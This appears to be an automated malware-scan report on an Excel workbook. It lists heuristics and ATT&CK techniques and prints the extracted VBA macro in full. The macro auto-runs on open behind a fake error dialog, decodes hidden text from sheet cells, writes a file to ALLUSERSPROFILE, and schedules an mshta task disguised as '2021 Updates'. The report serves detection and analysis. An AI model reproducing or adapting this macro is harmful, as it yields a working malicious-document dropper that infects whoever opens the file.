MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218 System Binary Proxy Execution
The critical heuristic 'OLE_VBA_LOLBIN' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the VBA macro is designed to execute a legitimate Windows binary (LOLBin) to perform malicious actions. The macro attempts to create a file named 'xHtmlCalc.xsl' in the ALLUSERSPROFILE directory, which is a common technique for downloading and executing further stages of malware. The use of CreateObject and Schedule.Service suggests an attempt to schedule or execute a payload.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set xPaperEnvelopeC3 = xDataAndLabel.Actions.Create(xCSV) xPaperEnvelopeC3.Path = "mshta" xPaperEnvelopeC3.Arguments = xCellTypeSameFormatConditions -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Next xZero With CreateObject("Scripting.FileSystemObject") Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Sub Workbook_Open() On Error GoTo xUnderlineStyleSingleAccounting -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
With CreateObject("Scripting.FileSystemObject") Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl") End With
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3760 bytes |
SHA-256: 83aae2ffb4b73a503b329111c12650bc90bac85e1e1aa7b61397ec0e08910014 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
On Error GoTo xUnderlineStyleSingleAccounting
xDialogSize = 1 / 0
xUnderlineStyleSingleAccounting:
If Err.Number <> 0 Then
xDialogGallery3dArea = "Thank You!"
MsgBox xDialogGallery3dArea, , "Good", Err.HelpFile, Err.HelpContext
xCalculationAutomatic = xTitleBar()
End If
End Sub
Function xTitleBar()
For Each xZero In ActiveWorkbook.Sheets("Sheet1").Range("AN53:CD3664")
If xZero.Value > 0 And Len(xCellTypeSameFormatConditions) < 199 Then
xCellTypeSameFormatConditions = xCellTypeSameFormatConditions & Chr(xZero.Value)
ElseIf xZero.Value > 0 Then
xRoutingInProgress = xRoutingInProgress & Chr(xZero.Value)
End If
Next xZero
With CreateObject("Scripting.FileSystemObject")
Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl")
End With
Const xSummaryOnRight = 1
Const xCSV = 0
Set xErrorBars = CreateObject("Schedule.Service")
Call xErrorBars.Connect
Set xExcel4 = xErrorBars.GetFolder("")
Set xDataAndLabel = xErrorBars.NewTask(0)
Set xDialogAutoCorrect = xDataAndLabel.RegistrationInfo
xDialogAutoCorrect.Description = "Updates"
xDialogAutoCorrect.Author = "The Company"
Set xDialogCreateNames = xDataAndLabel.Principal
xDialogCreateNames.LogonType = 3
Set xWorksheet = xDataAndLabel.Settings
xWorksheet.Enabled = True
xWorksheet.StartWhenAvailable = True
xWorksheet.Hidden = False
Set xRangeAutoFormatTable9 = xDataAndLabel.Triggers
Set xChartAsWindow = xRangeAutoFormatTable9.Create(xSummaryOnRight)
xFilterInPlace = DateAdd("s", 120, Now)
xLinkStatusMissingFile = xDialogPivotFieldUngroup(xFilterInPlace)
xFilterInPlace = DateAdd("n", 5, Now)
xListConflictDialog = xDialogPivotFieldUngroup(xFilterInPlace)
xChartAsWindow.StartBoundary = xLinkStatusMissingFile
With xUpdateLinksAlways
.Write xRoutingInProgress
End With
xChartAsWindow.EndBoundary = xListConflictDialog
xChartAsWindow.ID = "TimeTriggerId"
xChartAsWindow.Enabled = True
Set xPaperEnvelopeC3 = xDataAndLabel.Actions.Create(xCSV)
xPaperEnvelopeC3.Path = "mshta"
xPaperEnvelopeC3.Arguments = xCellTypeSameFormatConditions
Call xExcel4.RegisterTaskDefinition("2021 Updates", xDataAndLabel, 6, , , 3)
End Function
Function xDialogPivotFieldUngroup(xPaperEnvelopeB4)
xUnlockedCells = "0" & Second(xPaperEnvelopeB4)
xValidAlertStop = "0" & Minute(xPaperEnvelopeB4)
xErrRef = "0" & Hour(xPaperEnvelopeB4)
xDialogObjectProtection = "0" & Day(xPaperEnvelopeB4)
xWebFormattingAll = "0" & Month(xPaperEnvelopeB4)
xRangeAutoFormatTable1 = Year(xPaperEnvelopeB4)
xInsideVertical = Right(xErrRef, 2) & ":" & Right(xValidAlertStop, 2) & ":" & Right(xUnlockedCells, 2)
xListDataTypeDateTime = xRangeAutoFormatTable1 & "-" & Right(xWebFormattingAll, 2) & "-" & Right(xDialogObjectProtection, 2)
xDialogPivotFieldUngroup = xListDataTypeDateTime & "T" & xInsideVertical
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 16896 bytes |
SHA-256: 3ea86194501b6222ad9edb1f3a10df74b29141350839a41223fcacafd1f79230 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.